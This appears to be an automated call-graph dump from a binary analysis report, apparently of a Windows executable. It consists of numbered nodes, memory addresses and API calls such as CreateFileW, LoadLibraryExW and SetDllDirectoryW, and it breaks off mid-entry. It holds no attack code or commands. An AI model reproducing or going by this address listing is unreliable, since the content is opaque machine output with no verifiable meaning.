7ffdf6a8b926 00007FFE1FFB6570 71053->71054 71053->71055 71054->71055 71056 7ffdf6a8b93d 00007FFE1FFB6570 71054->71056 71055->71047 71056->71055 71057 7ffdf6a8b957 00007FFE1FFB6570 71056->71057 71057->71055 71058 7ffdf7072210 71060 7ffdf707225b new[] 71058->71060 71061 7ffdf70723c9 00007FFE0E142010 71060->71061 71063 7ffdf70723d4 new[] 71060->71063 71064 7ffdf707238f 71060->71064 71061->71063 71062 7ffdf7072628 71062->71064 71065 7ffdf705d970 3 API calls 71062->71065 71063->71064 71066 7ffdf7069260 71063->71066 71065->71064 71067 7ffdf70692e5 new[] 71066->71067 71073 7ffdf7069340 new[] 71066->71073 71069 7ffdf7069325 00007FFE0E142010 71067->71069 71067->71073 71075 7ffdf7069572 71067->71075 71068 7ffdf7069405 00007FFE0E142010 71070 7ffdf70695db 71068->71070 71071 7ffdf7069427 00007FFE0E142010 71068->71071 71069->71073 71072 7ffdf70695de 00007FFE0E142010 00007FFE0E142010 71070->71072 71071->71072 71074 7ffdf7069629 71072->71074 71073->71068 71073->71074 71073->71075 71074->71075 71077 7ffdf705ff80 71074->71077 71075->71062 71079 7ffdf705ffd1 71077->71079 71078 7ffdf70601a0 CreateFileW 71078->71079 71079->71078 71080 7ffdf7060358 71079->71080 71080->71075 71081 7ffdf6a68e70 71082 7ffdf6a68e8a 71081->71082 71083 7ffdf6a68ea0 71082->71083 71085 7ffdf6a4204a 71082->71085 71085->71083 71086 7ffdf6a4f370 71085->71086 71087 7ffdf6a4f38a SetLastError 71086->71087 71088 7ffdf6a4f3aa 71087->71088 71089 7ffdf6a4f3ce 71088->71089 71091 7ffdf6a424aa 71088->71091 71089->71083 71091->71089 71092 7ffdf6a88010 71091->71092 71094 7ffdf6a8820f 71092->71094 71095 7ffdf6a88154 71092->71095 71097 7ffdf6a4127b 71092->71097 71094->71089 71095->71094 71096 7ffdf6a4127b SetLastError 71095->71096 71096->71095 71097->71095 71098 7ffdf6a88a40 71097->71098 71099 7ffdf6a88ac3 SetLastError 71098->71099 71100 7ffdf6a88b27 71098->71100 71099->71098 71099->71100 71100->71095 71101 7ffdf70b56b0 71102 7ffdf70b5712 71101->71102 71104 7ffdf70b56fe 71101->71104 71105 7ffdf70b2140 71102->71105 71106 7ffdf70b2188 71105->71106 71108 7ffdf70b21df 71105->71108 71107 7ffdf70b21d0 00007FFE0E142010 71106->71107 71106->71108 71107->71108 71112 7ffdf70b220e 71108->71112 71113 7ffdf70d4a80 71108->71113 71110 7ffdf70b2351 71110->71112 71117 7ffdf70b9760 10 API calls 71110->71117 71112->71104 71114 7ffdf70d4a99 71113->71114 71116 7ffdf70d4aa5 71113->71116 71118 7ffdf70d49b0 71114->71118 71116->71110 71117->71112 71119 7ffdf70d49ea 71118->71119 71122 7ffdf70d49fa 71118->71122 71124 7ffdf70d44f0 71119->71124 71121 7ffdf70d4a4d 71121->71116 71122->71121 71123 7ffdf70d44f0 9 API calls 71122->71123 71123->71122 71136 7ffdf70d41f0 71124->71136 71126 7ffdf70d45ac 71131 7ffdf70d4698 71126->71131 71133 7ffdf70d45da 71126->71133 71140 7ffdf7073750 71126->71140 71128 7ffdf70d4634 71129 7ffdf70d463a 71128->71129 71128->71131 71130 7ffdf70d466f 00007FFE0E142010 71129->71130 71129->71133 71130->71133 71131->71133 71144 7ffdf70cd030 71131->71144 71133->71122 71134 7ffdf70d48c7 71134->71133 71153 7ffdf70ae560 8 API calls 71134->71153 71137 7ffdf70d4212 71136->71137 71139 7ffdf70d421b 71136->71139 71137->71139 71154 7ffdf70d4d90 71137->71154 71139->71126 71143 7ffdf7073787 71140->71143 71141 7ffdf70737e9 71141->71128 71143->71141 71162 7ffdf7073330 71143->71162 71145 7ffdf70cd05d 71144->71145 71151 7ffdf70cd066 71144->71151 71145->71134 71148 7ffdf70cd674 71148->71134 71149 7ffdf70cd4dd new[] 71149->71148 71150 7ffdf70cd69d 00007FFE0E142010 71149->71150 71150->71148 71151->71145 71151->71149 71152 7ffdf70d41f0 5 API calls 71151->71152 71171 7ffdf70d5340 71151->71171 71175 7ffdf7088f80 71151->71175 71152->71151 71153->71133 71157 7ffdf70d4e04 71154->71157 71155 7ffdf70d50da 71159 7ffdf70d4e7f 71155->71159 71161 7ffdf7073750 3 API calls 71155->71161 71156 7ffdf70d5014 00007FFE0E142010 71158 7ffdf70d5034 71156->71158 71157->71156 71157->71158 71157->71159 71158->71155 71160 7ffdf70d50c5 00007FFE0E142010 71158->71160 71159->71139 71160->71155 71161->71155 71167 7ffdf7069cb0 71162->71167 71164 7ffdf7073341 71165 7ffdf7073362 71164->71165 71166 7ffdf706a080 3 API calls 71164->71166 71165->71143 71166->71165 71168 7ffdf7069ce0 71167->71168 71169 7ffdf7069d71 71167->71169 71168->71169 71170 7ffdf705d970 3 API calls 71168->71170 71169->71164 71170->71169 71172 7ffdf70d5378 71171->71172 71174 7ffdf70d53ce 71171->71174 71172->71151 71173 7ffdf70d4d90 5 API calls 71173->71174 71174->71172 71174->71173 71177 7ffdf7088fa7 71175->71177 71178 7ffdf7088f94 71175->71178 71177->71178 71179 7ffdf7089086 71177->71179 71181 7ffdf70d5560 00007FFE0E142010 00007FFE0E142010 ReadFile 00007FFE0E142010 00007FFE0E142010 71177->71181 71178->71151 71179->71178 71180 7ffdf7089113 00007FFE0E142010 71179->71180 71180->71178 71181->71177 71182 7ff694362fe0 71183 7ff694362ff0 71182->71183 71184 7ff69436302b 71183->71184 71185 7ff694363041 71183->71185 71244 7ff694362710 54 API calls _log10_special 71184->71244 71188 7ff694363061 71185->71188 71194 7ff694363077 __vcrt_freefls 71185->71194 71187 7ff694363037 __vcrt_freefls 71190 7ff69436c5c0 _log10_special 8 API calls 71187->71190 71245 7ff694362710 54 API calls _log10_special 71188->71245 71191 7ff6943631fa 71190->71191 71193 7ff694363349 71252 7ff694362710 54 API calls _log10_special 71193->71252 71194->71187 71194->71193 71197 7ff694363333 71194->71197 71199 7ff69436330d 71194->71199 71201 7ff694363207 71194->71201 71210 7ff694361470 71194->71210 71240 7ff694361c80 71194->71240 71251 7ff694362710 54 API calls _log10_special 71197->71251 71250 7ff694362710 54 API calls _log10_special 71199->71250 71202 7ff694363273 71201->71202 71246 7ff69437a474 37 API calls 2 library calls 71201->71246 71204 7ff69436329e 71202->71204 71205 7ff694363290 71202->71205 71248 7ff694362dd0 37 API calls 71204->71248 71247 7ff69437a474 37 API calls 2 library calls 71205->71247 71208 7ff69436329c 71249 7ff694362500 54 API calls __vcrt_freefls 71208->71249 71253 7ff6943645b0 71210->71253 71213 7ff69436149b 71293 7ff694362710 54 API calls _log10_special 71213->71293 71214 7ff6943614bc 71263 7ff694370744 71214->71263 71217 7ff6943614ab 71217->71194 71218 7ff6943614d1 71219 7ff6943614f8 71218->71219 71220 7ff6943614d5 71218->71220 71223 7ff694361508 71219->71223 71224 7ff694361532 71219->71224 71294 7ff694374f78 11 API calls _get_daylight 71220->71294 71222 7ff6943614da 71295 7ff694362910 54 API calls _log10_special 71222->71295 71296 7ff694374f78 11 API calls _get_daylight 71223->71296 71227 7ff69436154b 71224->71227 71228 7ff694361538 71224->71228 71233 7ff6943614f3 __vcrt_freefls 71227->71233 71236 7ff6943615d6 71227->71236 71298 7ff69437040c 71227->71298 71267 7ff694361210 71228->71267 71229 7ff694361510 71297 7ff694362910 54 API calls _log10_special 71229->71297 71289 7ff6943700bc 71233->71289 71234 7ff6943615c4 71234->71194 71301 7ff694374f78 11 API calls _get_daylight 71236->71301 71238 7ff6943615db 71302 7ff694362910 54 API calls _log10_special 71238->71302 71241 7ff694361ca5 71240->71241 71541 7ff6943749f4 71241->71541 71244->71187 71245->71187 71246->71202 71247->71208 71248->71208 71249->71187 71250->71187 71251->71187 71252->71187 71254 7ff6943645bc 71253->71254 71303 7ff694369400 71254->71303 71256 7ff6943645e4 71257 7ff694369400 2 API calls 71256->71257 71258 7ff6943645f7 71257->71258 71308 7ff694376004 71258->71308 71261 7ff69436c5c0 _log10_special 8 API calls 71262 7ff694361493 71261->71262 71262->71213 71262->71214 71264 7ff694370774 71263->71264 71474 7ff6943704d4 71264->71474 71266 7ff69437078d 71266->71218 71268 7ff694361268 71267->71268 71269 7ff694361297 71268->71269 71270 7ff69436126f 71268->71270 71273 7ff6943612d4 71269->71273 71274 7ff6943612b1 71269->71274 71491 7ff694362710 54 API calls _log10_special 71270->71491 71272 7ff694361282 71272->71233 71278 7ff6943612e6 71273->71278 71283 7ff694361309 memcpy_s 71273->71283 71492 7ff694374f78 11 API calls _get_daylight 71274->71492 71276 7ff6943612b6 71493 7ff694362910 54 API calls _log10_special 71276->71493 71494 7ff694374f78 11 API calls _get_daylight 71278->71494 71280 7ff69437040c _fread_nolock 53 API calls 71280->71283 71281 7ff6943612eb 71495 7ff694362910 54 API calls _log10_special 71281->71495 71283->71280 71284 7ff6943612cf __vcrt_freefls 71283->71284 71285 7ff6943613cf 71283->71285 71288 7ff694370180 37 API calls 71283->71288 71487 7ff694370b4c 71283->71487 71284->71233 71496 7ff694362710 54 API calls _log10_special 71285->71496 71288->71283 71290 7ff6943700ec 71289->71290 71513 7ff69436fe98 71290->71513 71292 7ff694370105 71292->71234 71293->71217 71294->71222 71295->71233 71296->71229 71297->71233 71525 7ff69437042c 71298->71525 71301->71238 71302->71233 71304 7ff694369422 MultiByteToWideChar 71303->71304 71305 7ff694369446 71303->71305 71304->71305 71307 7ff69436945c __vcrt_freefls 71304->71307 71306 7ff694369463 MultiByteToWideChar 71305->71306 71305->71307 71306->71307 71307->71256 71309 7ff694375f38 71308->71309 71310 7ff694375f5e 71309->71310 71313 7ff694375f91 71309->71313 71339 7ff694374f78 11 API calls _get_daylight 71310->71339 71312 7ff694375f63 71340 7ff69437a950 37 API calls _invalid_parameter_noinfo 71312->71340 71315 7ff694375f97 71313->71315 71316 7ff694375fa4 71313->71316 71341 7ff694374f78 11 API calls _get_daylight 71315->71341 71327 7ff69437ac98 71316->71327 71320 7ff694375fb8 71342 7ff694374f78 11 API calls _get_daylight 71320->71342 71321 7ff694375fc5 71334 7ff69437ff3c 71321->71334 71324 7ff694375fd8 71343 7ff6943754e8 LeaveCriticalSection 71324->71343 71326 7ff694364606 71326->71261 71344 7ff694380348 EnterCriticalSection 71327->71344 71329 7ff69437acaf 71330 7ff69437ad0c 19 API calls 71329->71330 71331 7ff69437acba 71330->71331 71332 7ff6943803a8 _isindst LeaveCriticalSection 71331->71332 71333 7ff694375fae 71332->71333 71333->71320 71333->71321 71345 7ff69437fc38 71334->71345 71337 7ff69437ff96 71337->71324 71339->71312 71340->71326 71341->71326 71342->71326 71350 7ff69437fc73 __vcrt_FlsAlloc 71345->71350 71347 7ff69437ff11 71364 7ff69437a950 37 API calls _invalid_parameter_noinfo 71347->71364 71349 7ff69437fe43 71349->71337 71357 7ff694386dc4 71349->71357 71355 7ff69437fe3a 71350->71355 71360 7ff694377aac 51 API calls 3 library calls 71350->71360 71352 7ff69437fea5 71352->71355 71361 7ff694377aac 51 API calls 3 library calls 71352->71361 71354 7ff69437fec4 71354->71355 71362 7ff694377aac 51 API calls 3 library calls 71354->71362 71355->71349 71363 7ff694374f78 11 API calls _get_daylight 71355->71363 71365 7ff6943863c4 71357->71365 71360->71352 71361->71354 71362->71355 71363->71347 71364->71349 71366 7ff6943863db 71365->71366 71367 7ff6943863f9 71365->71367 71419 7ff694374f78 11 API calls _get_daylight 71366->71419 71367->71366 71370 7ff694386415 71367->71370 71369 7ff6943863e0 71420 7ff69437a950 37 API calls _invalid_parameter_noinfo 71369->71420 71376 7ff6943869d4 71370->71376 71373 7ff6943863ec 71373->71337 71422 7ff694386708 71376->71422 71379 7ff694386a49 71453 7ff694374f58 11 API calls _get_daylight 71379->71453 71380 7ff694386a61 71441 7ff694378590 71380->71441 71383 7ff694386a4e 71454 7ff694374f78 11 API calls _get_daylight 71383->71454 71392 7ff694386440 71392->71373 71421 7ff694378568 LeaveCriticalSection 71392->71421 71419->71369 71420->71373 71423 7ff694386734 71422->71423 71431 7ff69438674e 71422->71431 71423->71431 71466 7ff694374f78 11 API calls _get_daylight 71423->71466 71425 7ff694386743 71467 7ff69437a950 37 API calls _invalid_parameter_noinfo 71425->71467 71427 7ff69438681d 71438 7ff69438687a 71427->71438 71472 7ff694379be8 37 API calls 2 library calls 71427->71472 71428 7ff6943867cc 71428->71427 71470 7ff694374f78 11 API calls _get_daylight 71428->71470 71431->71428 71468 7ff694374f78 11 API calls _get_daylight 71431->71468 71432 7ff694386876 71432->71438 71439 7ff69437a970 _isindst 17 API calls 71432->71439 71433 7ff694386812 71471 7ff69437a950 37 API calls _invalid_parameter_noinfo 71433->71471 71436 7ff6943867c1 71469 7ff69437a950 37 API calls _invalid_parameter_noinfo 71436->71469 71438->71379 71438->71380 71440 7ff69438690d 71439->71440 71473 7ff694380348 EnterCriticalSection 71441->71473 71453->71383 71454->71392 71466->71425 71467->71431 71468->71436 71469->71428 71470->71433 71471->71427 71472->71432 71475 7ff69437053e 71474->71475 71476 7ff6943704fe 71474->71476 71475->71476 71478 7ff69437054a 71475->71478 71486 7ff69437a884 37 API calls 2 library calls 71476->71486 71485 7ff6943754dc EnterCriticalSection 71478->71485 71480 7ff694370525 71480->71266 71481 7ff69437054f 71482 7ff694370658 71 API calls 71481->71482 71483 7ff694370561 71482->71483 71484 7ff6943754e8 _fread_nolock LeaveCriticalSection 71483->71484 71484->71480 71486->71480 71488 7ff694370b7c 71487->71488 71497 7ff69437089c 71488->71497 71490 7ff694370b9a 71490->71283 71491->71272 71492->71276 71493->71284 71494->71281 71495->71284 71496->71284 71498 7ff6943708bc 71497->71498 71499 7ff6943708e9 71497->71499 71498->71499 71500 7ff6943708c6 71498->71500 71501 7ff6943708f1 71498->71501 71499->71490 71511 7ff69437a884 37 API calls 2 library calls 71500->71511 71504 7ff6943707dc 71501->71504 71512 7ff6943754dc EnterCriticalSection 71504->71512 71506 7ff6943707f9 71507 7ff69437081c 74 API calls 71506->71507 71508 7ff694370802 71507->71508 71509 7ff6943754e8 _fread_nolock LeaveCriticalSection 71508->71509 71510 7ff69437080d 71509->71510 71510->71499 71511->71499 71514 7ff69436feb3 71513->71514 71515 7ff69436fee1 71513->71515 71524 7ff69437a884 37 API calls 2 library calls 71514->71524 71522 7ff69436fed3 71515->71522 71523 7ff6943754dc EnterCriticalSection 71515->71523 71518 7ff69436fef8 71519 7ff69436ff14 72 API calls 71518->71519 71520 7ff69436ff04 71519->71520 71521 7ff6943754e8 _fread_nolock LeaveCriticalSection 71520->71521 71521->71522 71522->71292 71524->71522 71526 7ff694370456 71525->71526 71527 7ff694370424 71525->71527 71526->71527 71528 7ff694370465 memcpy_s 71526->71528 71529 7ff6943704a2 71526->71529 71527->71227 71539 7ff694374f78 11 API calls _get_daylight 71528->71539 71538 7ff6943754dc EnterCriticalSection 71529->71538 71531 7ff6943704aa 71533 7ff6943701ac _fread_nolock 51 API calls 71531->71533 71535 7ff6943704c1 71533->71535 71534 7ff69437047a 71540 7ff69437a950 37 API calls _invalid_parameter_noinfo 71534->71540 71537 7ff6943754e8 _fread_nolock LeaveCriticalSection 71535->71537 71537->71527 71539->71534 71540->71527 71544 7ff694374a4e 71541->71544 71542 7ff694374a73 71559 7ff69437a884 37 API calls 2 library calls 71542->71559 71544->71542 71545 7ff694374aaf 71544->71545 71560 7ff694372c80 49 API calls _invalid_parameter_noinfo 71545->71560 71547 7ff694374a9d 71548 7ff69436c5c0 _log10_special 8 API calls 71547->71548 71550 7ff694361cc8 71548->71550 71549 7ff69437a9b8 __free_lconv_mon 11 API calls 71549->71547 71550->71194 71551 7ff694374b46 71552 7ff694374bb0 71551->71552 71554 7ff694374b58 71551->71554 71555 7ff694374b8c 71551->71555 71558 7ff694374b61 71551->71558 71552->71555 71556 7ff694374bba 71552->71556 71554->71555 71554->71558 71555->71549 71557 7ff69437a9b8 __free_lconv_mon 11 API calls 71556->71557 71557->71547 71561 7ff69437a9b8 71558->71561 71559->71547 71560->71551 71562 7ff69437a9bd HeapFree 71561->71562 71563 7ff69437a9ec 71561->71563 71562->71563 71564 7ff69437a9d8 GetLastError 71562->71564 71563->71547 71565 7ff69437a9e5 __free_lconv_mon 71564->71565 71567 7ff694374f78 11 API calls _get_daylight 71565->71567 71567->71563 71568 7ff69436ccac 71589 7ff69436ce7c 71568->71589 71571 7ff69436cdf8 71738 7ff69436d19c 7 API calls 2 library calls 71571->71738 71572 7ff69436ccc8 __scrt_acquire_startup_lock 71574 7ff69436ce02 71572->71574 71579 7ff69436cce6 __scrt_release_startup_lock 71572->71579 71739 7ff69436d19c 7 API calls 2 library calls 71574->71739 71576 7ff69436cd0b 71577 7ff69436ce0d _CallSETranslator 71578 7ff69436cd91 71595 7ff69436d2e4 71578->71595 71579->71576 71579->71578 71735 7ff694379b9c 45 API calls 71579->71735 71581 7ff69436cd96 71598 7ff694361000 71581->71598 71586 7ff69436cdb9 71586->71577 71737 7ff69436d000 7 API calls 71586->71737 71588 7ff69436cdd0 71588->71576 71590 7ff69436ce84 71589->71590 71591 7ff69436ce90 __scrt_dllmain_crt_thread_attach 71590->71591 71592 7ff69436ce9d 71591->71592 71594 7ff69436ccc0 71591->71594 71592->71594 71740 7ff69436d8f8 7 API calls 2 library calls 71592->71740 71594->71571 71594->71572 71741 7ff69438a540 71595->71741 71599 7ff694361009 71598->71599 71743 7ff6943754f4 71599->71743 71601 7ff6943637fb 71750 7ff6943636b0 71601->71750 71605 7ff69436c5c0 _log10_special 8 API calls 71607 7ff694363ca7 71605->71607 71736 7ff69436d328 GetModuleHandleW 71607->71736 71608 7ff69436391b 71610 7ff6943645b0 108 API calls 71608->71610 71609 7ff69436383c 71611 7ff694361c80 49 API calls 71609->71611 71612 7ff69436392b 71610->71612 71613 7ff69436385b 71611->71613 71614 7ff69436396a 71612->71614 71845 7ff694367f80 71612->71845 71822 7ff694368a20 71613->71822 71854 7ff694362710 54 API calls _log10_special 71614->71854 71618 7ff69436388e 71625 7ff6943638bb __vcrt_freefls 71618->71625 71844 7ff694368b90 40 API calls __vcrt_freefls 71618->71844 71619 7ff69436395d 71620 7ff694363962 71619->71620 71621 7ff694363984 71619->71621 71623 7ff6943700bc 74 API calls 71620->71623 71624 7ff694361c80 49 API calls 71621->71624 71623->71614 71626 7ff6943639a3 71624->71626 71627 7ff694368a20 14 API calls 71625->71627 71635 7ff6943638de __vcrt_freefls 71625->71635 71630 7ff694361950 115 API calls 71626->71630 71627->71635 71629 7ff694363a0b 71857 7ff694368b90 40 API calls __vcrt_freefls 71629->71857 71632 7ff6943639ce 71630->71632 71632->71613 71634 7ff6943639de 71632->71634 71633 7ff694363a17 71858 7ff694368b90 40 API calls __vcrt_freefls 71633->71858 71855 7ff694362710 54 API calls _log10_special 71634->71855 71640 7ff69436390e __vcrt_freefls 71635->71640 71856 7ff694368b30 40 API calls __vcrt_freefls 71635->71856 71638 7ff694363a23 71859 7ff694368b90 40 API calls __vcrt_freefls 71638->71859 71641 7ff694368a20 14 API calls 71640->71641 71642 7ff694363a3b 71641->71642 71643 7ff694363b2f 71642->71643 71644 7ff694363a60 __vcrt_freefls 71642->71644 71861 7ff694362710 54 API calls _log10_special 71643->71861 71654 7ff694363aab 71644->71654 71860 7ff694368b30 40 API calls __vcrt_freefls 71644->71860 71647 7ff694368a20 14 API calls 71648 7ff694363bf4 __vcrt_freefls 71647->71648 71649 7ff694363c46 71648->71649 71650 7ff694363d41 71648->71650 71651 7ff694363cd4 71649->71651 71652 7ff694363c50 71649->71652 71866 7ff6943644d0 49 API calls 71650->71866 71656 7ff694368a20 14 API calls 71651->71656 71862 7ff6943690e0 59 API calls _log10_special 71652->71862 71654->71647 71659 7ff694363ce0 71656->71659 71657 7ff694363d4f 71660 7ff694363d65 71657->71660 71661 7ff694363d71 71657->71661 71658 7ff694363c55 71662 7ff694363cb3 71658->71662 71663 7ff694363c61 71658->71663 71659->71663 71667 7ff694363ced 71659->71667 71867 7ff694364620 71660->71867 71665 7ff694361c80 49 API calls 71661->71665 71864 7ff694368850 86 API calls 2 library calls 71662->71864 71863 7ff694362710 54 API calls _log10_special 71663->71863 71678 7ff694363d2b __vcrt_freefls 71665->71678 71671 7ff694361c80 49 API calls 71667->71671 71668 7ff694363dc4 71672 7ff694369400 2 API calls 71668->71672 71669 7ff694363cbb 71673 7ff694363cc8 71669->71673 71674 7ff694363cbf 71669->71674 71675 7ff694363d0b 71671->71675 71677 7ff694363dd7 SetDllDirectoryW 71672->71677 71673->71678 71674->71663 71675->71678 71679 7ff694363d12 71675->71679 71676 7ff694363da7 SetDllDirectoryW LoadLibraryExW 71676->71668 71683 7ff694363e0a 71677->71683 71727 7ff694363e5a 71677->71727 71678->71668 71678->71676 71865 7ff694362710 54 API calls _log10_special 71679->71865 71682 7ff694363808 __vcrt_freefls 71682->71605 71685 7ff694368a20 14 API calls 71683->71685 71684 7ff694363ffc 71687 7ff694364006 PostMessageW GetMessageW 71684->71687 71688 7ff694364029 71684->71688 71691 7ff694363e16 __vcrt_freefls 71685->71691 71686 7ff694363f1b 71878 7ff6943633c0 121 API calls 2 library calls 71686->71878 71687->71688 71835 7ff694363360 71688->71835 71690 7ff694363f23 71690->71682 71692 7ff694363f2b 71690->71692 71694 7ff694363ef2 71691->71694 71698 7ff694363e4e 71691->71698 71879 7ff6943690c0 LocalFree 71692->71879 71877 7ff694368b30 40 API calls __vcrt_freefls 71694->71877 71698->71727 71870 7ff694366db0 54 API calls _get_daylight 71698->71870 71703 7ff694364043 71881 7ff694366fb0 FreeLibrary 71703->71881 71706 7ff69436404f 71710 7ff694363e6c 71871 7ff694367330 117 API calls 2 library calls 71710->71871 71714 7ff694363e81 71716 7ff694363ea2 71714->71716 71728 7ff694363e85 71714->71728 71872 7ff694366df0 120 API calls _log10_special 71714->71872 71716->71728 71873 7ff6943671a0 125 API calls 71716->71873 71720 7ff694363eb7 71720->71728 71874 7ff6943674e0 55 API calls 71720->71874 71722 7ff694363ee0 71876 7ff694366fb0 FreeLibrary 71722->71876 71727->71684 71727->71686 71728->71727 71875 7ff694362a50 54 API calls _log10_special 71728->71875 71735->71578 71736->71586 71737->71588 71738->71574 71739->71577 71740->71594 71742 7ff69436d2fb GetStartupInfoW 71741->71742 71742->71581 71745 7ff69437f4f0 71743->71745 71746 7ff69437f596 71745->71746 71747 7ff69437f543 71745->71747 71883 7ff69437f3c8 71 API calls _fread_nolock 71746->71883 71882 7ff69437a884 37 API calls 2 library calls 71747->71882 71749 7ff69437f56c 71749->71601 71884 7ff69436c8c0 71750->71884 71752 7ff6943636bc GetModuleFileNameW 71753 7ff6943636eb GetLastError 71752->71753 71754 7ff694363710 71752->71754 71891 7ff694362c50 51 API calls _log10_special 71753->71891 71886 7ff6943692f0 FindFirstFileExW 71754->71886 71757 7ff694363706 71762 7ff69436c5c0 _log10_special 8 API calls 71757->71762 71759 7ff69436377d 71894 7ff6943694b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 71759->71894 71760 7ff694363723 71892 7ff694369370 CreateFileW GetFinalPathNameByHandleW CloseHandle 71760->71892 71765 7ff6943637b5 71762->71765 71764 7ff69436378b 71764->71757 71895 7ff694362810 49 API calls _log10_special 71764->71895 71765->71682 71772 7ff694361950 71765->71772 71766 7ff694363730 71767 7ff69436374c __vcrt_FlsAlloc 71766->71767 71768 7ff694363734 71766->71768 71767->71759 71893 7ff694362810 49 API calls _log10_special 71768->71893 71771 7ff694363745 71771->71757 71773 7ff6943645b0 108 API calls 71772->71773 71774 7ff694361985 71773->71774 71775 7ff694361c43 71774->71775 71777 7ff694367f80 83 API calls 71774->71777 71776 7ff69436c5c0 _log10_special 8 API calls 71775->71776 71778 7ff694361c5e 71776->71778 71779 7ff6943619cb 71777->71779 71778->71608 71778->71609 71780 7ff694370744 73 API calls 71779->71780 71821 7ff694361a03 71779->71821 71782 7ff6943619e5 71780->71782 71781 7ff6943700bc 74 API calls 71781->71775 71783 7ff6943619e9 71782->71783 71784 7ff694361a08 71782->71784 71896 7ff694374f78 11 API calls _get_daylight 71783->71896 71786 7ff69437040c _fread_nolock 53 API calls 71784->71786 71788 7ff694361a20 71786->71788 71787 7ff6943619ee 71897 7ff694362910 54 API calls _log10_special 71787->71897 71790 7ff694361a26 71788->71790 71791 7ff694361a45 71788->71791 71898 7ff694374f78 11 API calls _get_daylight 71790->71898 71794 7ff694361a7b 71791->71794 71795 7ff694361a5c 71791->71795 71793 7ff694361a2b 71899 7ff694362910 54 API calls _log10_special 71793->71899 71798 7ff694361c80 49 API calls 71794->71798 71900 7ff694374f78 11 API calls _get_daylight 71795->71900 71800 7ff694361a92 71798->71800 71799 7ff694361a61 71901 7ff694362910 54 API calls _log10_special 71799->71901 71802 7ff694361c80 49 API calls 71800->71802 71803 7ff694361add 71802->71803 71804 7ff694370744 73 API calls 71803->71804 71805 7ff694361b01 71804->71805 71806 7ff694361b16 71805->71806 71807 7ff694361b35 71805->71807 71902 7ff694374f78 11 API calls _get_daylight 71806->71902 71809 7ff69437040c _fread_nolock 53 API calls 71807->71809 71811 7ff694361b4a 71809->71811 71810 7ff694361b1b 71903 7ff694362910 54 API calls _log10_special 71810->71903 71813 7ff694361b6f 71811->71813 71814 7ff694361b50 71811->71814 71906 7ff694370180 37 API calls 2 library calls 71813->71906 71904 7ff694374f78 11 API calls _get_daylight 71814->71904 71817 7ff694361b89 71817->71821 71907 7ff694362710 54 API calls _log10_special 71817->71907 71818 7ff694361b55 71905 7ff694362910 54 API calls _log10_special 71818->71905 71821->71781 71823 7ff694368a2a 71822->71823 71824 7ff694369400 2 API calls 71823->71824 71825 7ff694368a49 GetEnvironmentVariableW 71824->71825 71826 7ff694368a66 ExpandEnvironmentStringsW 71825->71826 71827 7ff694368ab2 71825->71827 71826->71827 71828 7ff694368a88 71826->71828 71829 7ff69436c5c0 _log10_special 8 API calls 71827->71829 71908 7ff6943694b0 WideCharToMultiByte WideCharToMultiByte __vcrt_freefls 71828->71908 71831 7ff694368ac4 71829->71831 71831->71618 71832 7ff694368a9a 71833 7ff69436c5c0 _log10_special 8 API calls 71832->71833 71834 7ff694368aaa 71833->71834 71834->71618 71909 7ff694366350 71835->71909 71839 7ff694363381 71843 7ff694363399 71839->71843 71977 7ff694366040 71839->71977 71841 7ff69436338d 71841->71843 71986 7ff6943661d0 54 API calls 71841->71986 71880 7ff694363670 FreeLibrary 71843->71880 71844->71625 71846 7ff694367fa4 71845->71846 71847 7ff694370744 73 API calls 71846->71847 71848 7ff69436807b __vcrt_freefls 71846->71848 71849 7ff694367fc0 71847->71849 71848->71619 71849->71848 72040 7ff694377938 71849->72040 71851 7ff694370744 73 API calls 71853 7ff694367fd5 71851->71853 71852 7ff69437040c _fread_nolock 53 API calls 71852->71853 71853->71848 71853->71851 71853->71852 71854->71682 71855->71682 71856->71629 71857->71633 71858->71638 71859->71640 71860->71654 71861->71682 71862->71658 71863->71682 71864->71669 71865->71682 71866->71657 71868 7ff694361c80 49 API calls 71867->71868 71869 7ff694364650 71868->71869 71869->71678 71870->71710 71871->71714 71872->71716 71873->71720 71874->71728 71875->71722 71876->71727 71877->71727 71878->71690 71880->71703 71881->71706 71882->71749 71883->71749 71885 7ff69436c8ea 71884->71885 71885->71752 71885->71885 71887 7ff694369342 71886->71887 71888 7ff69436932f FindClose 71886->71888 71889 7ff69436c5c0 _log10_special 8 API calls 71887->71889 71888->71887 71890 7ff69436371a 71889->71890 71890->71759 71890->71760 71891->71757 71892->71766 71893->71771 71894->71764 71895->71757 71896->71787 71897->71821 71898->71793 71899->71821 71900->71799 71901->71821 71902->71810 71903->71821 71904->71818 71905->71821 71906->71817 71907->71821 71908->71832 71910 7ff694366365 71909->71910 71911 7ff694361c80 49 API calls 71910->71911 71912 7ff6943663a1 71911->71912 71913 7ff6943663aa 71912->71913 71914 7ff6943663cd 71912->71914 71997 7ff694362710 54 API calls _log10_special 71913->71997 71916 7ff694364620 49 API calls 71914->71916 71917 7ff6943663e5 71916->71917 71918 7ff694366403 71917->71918 71998 7ff694362710 54 API calls _log10_special 71917->71998 71987 7ff694364550 71918->71987 71919 7ff69436c5c0 _log10_special 8 API calls 71922 7ff69436336e 71919->71922 71922->71843 71940 7ff6943664f0 71922->71940 71924 7ff69436641b 71925 7ff694364620 49 API calls 71924->71925 71927 7ff694366434 71925->71927 71928 7ff694366459 71927->71928 71929 7ff694366439 71927->71929 71931 7ff694369070 3 API calls 71928->71931 71999 7ff694362710 54 API calls _log10_special 71929->71999 71933 7ff694366466 71931->71933 71932 7ff6943663c3 71932->71919 71934 7ff694366472 71933->71934 71935 7ff6943664b1 71933->71935 71936 7ff694369400 2 API calls 71934->71936 72001 7ff694365820 137 API calls 71935->72001 71938 7ff69436648a GetLastError 71936->71938 72000 7ff694362c50 51 API calls _log10_special 71938->72000 72002 7ff6943653f0 71940->72002 71942 7ff694366516 71943 7ff69436652f 71942->71943 71944 7ff69436651e 71942->71944 72009 7ff694364c80 71943->72009 72027 7ff694362710 54 API calls _log10_special 71944->72027 71948 7ff69436653b 72028 7ff694362710 54 API calls _log10_special 71948->72028 71949 7ff69436654c 71952 7ff69436655c 71949->71952 71954 7ff69436656d 71949->71954 71951 7ff69436652a 71951->71839 72029 7ff694362710 54 API calls _log10_special 71952->72029 71955 7ff69436659d 71954->71955 71956 7ff69436658c 71954->71956 71958 7ff6943665bd 71955->71958 71959 7ff6943665ac 71955->71959 72030 7ff694362710 54 API calls _log10_special 71956->72030 72013 7ff694364d40 71958->72013 72031 7ff694362710 54 API calls _log10_special 71959->72031 71963 7ff6943665dd 71966 7ff6943665fd 71963->71966 71967 7ff6943665ec 71963->71967 71964 7ff6943665cc 72032 